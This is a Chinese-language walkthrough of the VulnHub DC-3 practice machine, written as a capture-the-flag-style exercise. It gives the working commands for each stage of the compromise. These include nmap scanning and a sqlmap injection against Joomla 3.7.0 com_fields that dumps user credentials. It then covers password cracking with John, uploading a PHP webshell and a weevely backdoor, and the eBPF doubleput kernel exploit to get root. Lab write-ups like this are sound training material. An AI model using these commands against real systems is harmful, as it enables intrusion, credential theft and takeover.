vulnhub系列靶机--DC3

vulnhub系列靶机–DC3

主机发现：

先主机发现找到靶机的ip

使用nmap

nmap -sP 192.168.211.0/24

netdiscover -r 192.168.211.1/24

根据MAC地址可以确定靶机的ip为192.168.211.136

然后扫描该ip所开放的端口服务

nmap -A 192.168.211.136 -p 1-65535

发现靶机只开放了80端口，访问但没有任何线索

使用Nikto扫描网站目录

发现了后台登陆界面http://192.168.211.136/administrator/

这时我们要对网站进行指纹识别

whatweb 192.168.211.136

发现网站框架是Joomla

然后我们可以使用joomscan扫描joomla网站

joomscan -u http://192.168.211.136

我们扫出了Joomla版本等信息

然后搜索Joomla3.7.0的漏洞 searchsploit Joomla 3.7.0

发现一个SQL注入漏洞

将漏洞信息保存到本地

cp /usr/share/exploitdb/exploits/php/webapps/42033.txt joomla_sql.txt

得到了注入点等信息

sqlmap -u “http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

我们成功获取了数据库

–current-db获取当前数据库

-D “joomladb” --tables

获取该数据库下的表名

-D “joomladb” -T “#__users” --columns获取#_user 中的列名

-D “joomladb” -T “#__users” -C “name,password” --dump获取字段

然后将密码解密

先将密码写入一个文件里面，然后使用John解密

解密出密码是Snoopy

成功进入后台

发现可以查看源码

在http://192.168.211.136/templates/beez3/html/2.php中写入一句话木马，然后使用蚁剑连接

模拟终端

反弹shell

weevely generate 123456 shell1.php

密码：123456

脚本文件名：shell.php

将脚本上传到网站上

kali上面连接

weevely http://192.168.211.136/templates/beez3/html/shell1.php 123456 成功获取shell

接下来提权

www-data用户，主机Ubuntu 16.04 内核 4.4.0-21

在kali里面搜索这个版本漏洞searchsploit Ubuntu 16.04

查看漏洞介绍

cp /usr/share/exploitdb/exploits/linux/local/39772.txt ubuntu-1604-shell.txt

cat ubuntu-1604-shell.txt

下载exp，将里面的exploit.tar上传，并解压运行

unzip 39772.zip #解压29772.zip文件

cd 39772

tar -xvf exploit.tar #解压exploit提权脚本tar包

cd ebpf_mapfd_doubleput_exploit

编译代码

./compile.sh #执行脚本，编译文件

./doubleput #执行提权文件

获得root权限